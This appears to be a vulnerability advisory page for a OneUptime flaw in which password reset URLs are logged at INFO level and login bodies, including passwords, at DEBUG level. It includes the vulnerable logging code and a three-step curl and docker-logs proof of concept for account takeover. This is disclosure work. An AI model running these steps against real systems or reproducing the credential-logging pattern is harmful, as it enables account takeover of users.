GHSA-4524-CJ9J-G4FJ

Vulnerability from github – Published: 2026-03-13 20:05 – Updated: 2026-03-16 17:07
VLAI?
Summary
OneUptime: Password Reset Token Logged at INFO Level
Details

Summary

The password reset flow logs the complete password reset URL — containing the plaintext reset token — at INFO log level, which is enabled by default in production. Anyone with access to application logs (log aggregation, Docker logs, Kubernetes pod logs) can intercept reset tokens and perform account takeover on any user.

Details

Vulnerable code — App/FeatureSet/Identity/API/Authentication.ts lines 370-371:

logger.info("User forgot password: " + user.email?.toString());
logger.info("Reset Password URL: " + tokenVerifyUrl);

The tokenVerifyUrl is a complete URL like https://app.oneuptime.com/accounts/reset-password/<plaintext-token>. This is logged at INFO level, which is enabled by default in production and persisted to stdout, log files, and any configured log aggregation systems.

Additionally — login credentials logged at DEBUG level (line 909):

logger.debug("Login request data: " + JSON.stringify(req.body, null, 2));

The entire login request body (including cleartext password) is logged at DEBUG level. While DEBUG is typically disabled in production, it is commonly enabled during incident troubleshooting.

No existing CVEs cover sensitive data exposure in logging for OneUptime. CVE-2026-30956 (GHSA-r5v6-2599-9g3m) leaked resetPasswordToken from the database via multi-tenant header bypass — this finding is different (token leaked via application logs).

PoC

Environment: OneUptime v10.0.23 via docker compose up (default configuration)

# Step 1 — Trigger forgot-password for target user
curl -s -X POST http://TARGET:8080/api/identity/forgot-password \
  -H 'Content-Type: application/json' \
  -d '{"data": {"email": "test@example.com"}}'
# Response: {}

# Step 2 — Read application logs to extract the reset token
docker compose logs app --tail 5
# Output:
# app-1  | User forgot password: test@example.com
# app-1  | Reset Password URL: http://localhost/accounts/reset-password/20771cc6-860a-4b9b-bb9c-09eff67de4ef

# Step 3 — Use the extracted token to reset the victim's password
curl -s -X POST http://TARGET:8080/api/identity/reset-password \
  -H 'Content-Type: application/json' \
  -d '{"data": {"token": "20771cc6-860a-4b9b-bb9c-09eff67de4ef", "password": "NewPassword123!"}}'

Tested and confirmed on 2026-03-12 against oneuptime/app:release (APP_VERSION=10.0.23). Full password reset token 20771cc6-860a-4b9b-bb9c-09eff67de4ef visible in INFO-level logs.

Attack surface for log access: ELK/Elasticsearch dashboards (often misconfigured with default credentials), CloudWatch/Datadog/Splunk/Grafana Loki, docker logs / kubectl logs, shared log volumes, CDN/proxy access logs.

Impact

Any user's account can be taken over by anyone with read access to application logs:

  • Account takeover: Every password reset token is logged in plaintext, creating a persistent trail of sensitive tokens
  • Exposure scale: This logs EVERY password reset request — not a one-off, but systematic
  • Cascading impact: Combined with differential error responses in forgot-password (user enumeration), an attacker can systematically target any user
  • Organizations that aggregate OneUptime logs into shared logging infrastructure expose all password reset tokens to anyone with log reader access
Severity ?
6.9 (Medium)
CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "oneuptime"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "10.0.23"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-32598"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-532"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-13T20:05:12Z",
    "nvd_published_at": "2026-03-13T19:55:09Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nThe password reset flow logs the complete password reset URL \u2014 containing the plaintext reset token \u2014 at INFO log level, which is enabled by default in production. Anyone with access to application logs (log aggregation, Docker logs, Kubernetes pod logs) can intercept reset tokens and perform account takeover on any user.\n\n### Details\n\n**Vulnerable code \u2014 `App/FeatureSet/Identity/API/Authentication.ts` lines 370-371:**\n```typescript\nlogger.info(\"User forgot password: \" + user.email?.toString());\nlogger.info(\"Reset Password URL: \" + tokenVerifyUrl);\n```\n\nThe `tokenVerifyUrl` is a complete URL like `https://app.oneuptime.com/accounts/reset-password/\u003cplaintext-token\u003e`. This is logged at INFO level, which is enabled by default in production and persisted to stdout, log files, and any configured log aggregation systems.\n\n**Additionally \u2014 login credentials logged at DEBUG level (line 909):**\n```typescript\nlogger.debug(\"Login request data: \" + JSON.stringify(req.body, null, 2));\n```\n\nThe entire login request body (including cleartext password) is logged at DEBUG level. While DEBUG is typically disabled in production, it is commonly enabled during incident troubleshooting.\n\nNo existing CVEs cover sensitive data exposure in logging for OneUptime. CVE-2026-30956 (GHSA-r5v6-2599-9g3m) leaked `resetPasswordToken` from the database via multi-tenant header bypass \u2014 this finding is different (token leaked via application logs).\n\n### PoC\n\n**Environment:** OneUptime v10.0.23 via `docker compose up` (default configuration)\n\n```bash\n# Step 1 \u2014 Trigger forgot-password for target user\ncurl -s -X POST http://TARGET:8080/api/identity/forgot-password \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"data\": {\"email\": \"test@example.com\"}}\u0027\n# Response: {}\n\n# Step 2 \u2014 Read application logs to extract the reset token\ndocker compose logs app --tail 5\n# Output:\n# app-1  | User forgot password: test@example.com\n# app-1  | Reset Password URL: http://localhost/accounts/reset-password/20771cc6-860a-4b9b-bb9c-09eff67de4ef\n\n# Step 3 \u2014 Use the extracted token to reset the victim\u0027s password\ncurl -s -X POST http://TARGET:8080/api/identity/reset-password \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"data\": {\"token\": \"20771cc6-860a-4b9b-bb9c-09eff67de4ef\", \"password\": \"NewPassword123!\"}}\u0027\n```\n\n**Tested and confirmed on 2026-03-12 against `oneuptime/app:release` (APP_VERSION=10.0.23).** Full password reset token `20771cc6-860a-4b9b-bb9c-09eff67de4ef` visible in INFO-level logs.\n\n**Attack surface for log access:** ELK/Elasticsearch dashboards (often misconfigured with default credentials), CloudWatch/Datadog/Splunk/Grafana Loki, `docker logs` / `kubectl logs`, shared log volumes, CDN/proxy access logs.\n\n### Impact\n\nAny user\u0027s account can be taken over by anyone with read access to application logs:\n\n- **Account takeover:** Every password reset token is logged in plaintext, creating a persistent trail of sensitive tokens\n- **Exposure scale:** This logs EVERY password reset request \u2014 not a one-off, but systematic\n- **Cascading impact:** Combined with differential error responses in forgot-password (user enumeration), an attacker can systematically target any user\n- Organizations that aggregate OneUptime logs into shared logging infrastructure expose all password reset tokens to anyone with log reader access",
  "id": "GHSA-4524-cj9j-g4fj",
  "modified": "2026-03-16T17:07:40Z",
  "published": "2026-03-13T20:05:12Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/OneUptime/oneuptime/security/advisories/GHSA-4524-cj9j-g4fj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32598"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/OneUptime/oneuptime"
    },
    {
      "type": "WEB",
      "url": "https://github.com/OneUptime/oneuptime/releases/tag/10.0.23"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "OneUptime: Password Reset Token Logged at INFO Level"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.